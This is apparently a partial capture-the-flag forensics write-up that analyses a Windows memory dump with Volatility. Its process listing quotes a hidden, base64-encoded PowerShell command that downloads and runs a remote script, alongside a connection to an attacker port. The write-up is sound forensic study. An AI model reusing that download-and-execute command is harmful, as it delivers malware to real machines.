4.2 KiB
4.2 KiB
Honeypot
Santa really encourages people to be at his good list but sometimes he is a bit naughty himself. He is using a Windows 7 honeypot to capture any suspicious action. Since he is not a forensics expert, can you help him identify any indications of compromise?
- Find the full URL used to download the malware.
- Find the malicious's process ID.
- Find the attackers IP
Flag Format: HTB{echo -n "http://url.com/path.foo_PID_127.0.0.1" | md5sum} Download Link: http://46.101.25.140/forensics_honeypot.zip
Flag
Progress so far
- The honeypot.zip file contains ä windows memory dump
- By using the
volatility3framework one can extract data from the dump - By checking
vol -f honeypot.raw windows.cmdline.CMDLinethe malicious process is quite obvious
cat win_cmdline
... snip ...
3504 VBoxTray.exe "C:\Windows\System32\VBoxTray.exe"
3112 WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe
3324 iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe"
3344 iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe"
SCODEF:3324 CREDAT:14337
2700 powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /window hidden /e
aQBlAHgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHcAaQBuAGQAbwB3AHMAbABpAHYAZQB1AHAAZABhAHQAZQByAC4AYwBvAG0ALwB1AHAAZABhAHQAZQAuAHAAcwAxACcAKQApAA==
3732 conhost.exe \??\C:\Windows\system32\conhost.exe
"288449379-1457209856-1923954052-101100547-172367320720102786213404402731845854479
4028 whoami.exe Required memory at 0x7ffdf010 is not valid (process exited?)
4036 HOSTNAME.EXE Required memory at 0x7ffd7010 is not valid (process
exited?)
2924 DumpIt.exe "C:\Users\Santa\Desktop\DumpIt.exe"
2920 conhost.exe \??\C:\Windows\system32\conhost.exe
"280284285205075330588133904-110126809119471720131011406317-845024101-1158882802
168 dllhost.exe C:\Windows\system32\DllHost.exe
/Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
- The base64 string in the powershell command contains a url which contains a rickroll, this has to be the url
- The PID of said command is 2700
- By examining the currently active connections, using
vol -f honeypot.raw windows.netscan.Netscanthe following foreign IPs stand out:
Volatility 3 Framework 1.0.1
Offset Proto LocalAddr LocalPort ForeignAddr ForeignPort State PID Owner
Created
0x2554b460 TCPv4 10.0.2.15 49226 93.184.220.29 80 ESTABLISHED - - -
0x261e9d30 TCPv4 10.0.2.15 49228 172.67.177.22 443 ESTABLISHED - - -
0x3e2e9cc0 TCPv4 10.0.2.15 49221 212.205.126.106 443 ESTABLISHED - - -
0x3ee98d80 TCPv4 10.0.2.15 49229 147.182.172.189 4444 ESTABLISHED - - -
0x3f1b0df8 TCPv4 10.0.2.15 49216 212.205.126.106 443 ESTABLISHED - - -
0x3f225df8 TCPv4 10.0.2.15 49222 212.205.126.106 443 ESTABLISHED - - -
0x3f547008 TCPv4 10.0.2.15 49220 212.205.126.106 443 ESTABLISHED - - -
0x3f561438 TCPv4 10.0.2.15 49215 204.79.197.203 443 ESTABLISHED - - -
0x3f57c438 TCPv4 10.0.2.15 49218 95.100.210.141 443 ESTABLISHED - - -
0x3f58b4c8 TCPv4 10.0.2.15 49217 212.205.126.106 443 ESTABLISHED - - -
0x3f58c748 TCPv4 10.0.2.15 49223 212.205.126.106 443 ESTABLISHED - - -
0x3f58e9d8 TCPv4 10.0.2.15 49225 172.67.177.22 443 ESTABLISHED - - -
0x3f5c6df8 TCPv4 10.0.2.15 49219 95.100.210.141 443 ESTABLISHED - - -
- By eliminating all the ips which belong to M$ we end up with a small set of 5 ips.
- To generate the flag the follwing shell script was used, sadly with no success.
- I'm unsure about the
... | md5sumpart as this adds a hyphen...
#!/bin/bash
list=(
147.182.172.189 # digital ocean
#172.67.177.22 # cloudflare net
#212.205.126.106 # greece
#93.184.220.29 # edgecast
#95.100.210.141 # akamai
)
pids=(
1556 # explorer
2460 # SearchFilterHo
2856 # explorer
3324 # iexplorer
3344 # iexplorer
)
for ip in ${list[@]}; do
for pid in ${pids[@]}; do
echo Generating Flag for $ip and $pid:
echo "HTB{echo -n "https://windowsliveupdater.com/update.ps1_"$pid"_"$ip""|md5sum}"
echo "HTB{$(echo -n "https://windowsliveupdater.com/update.ps1_"$pid"_"$ip""|md5sum)}"
done
done
- I don't know, maybe the challenge is borked somehow?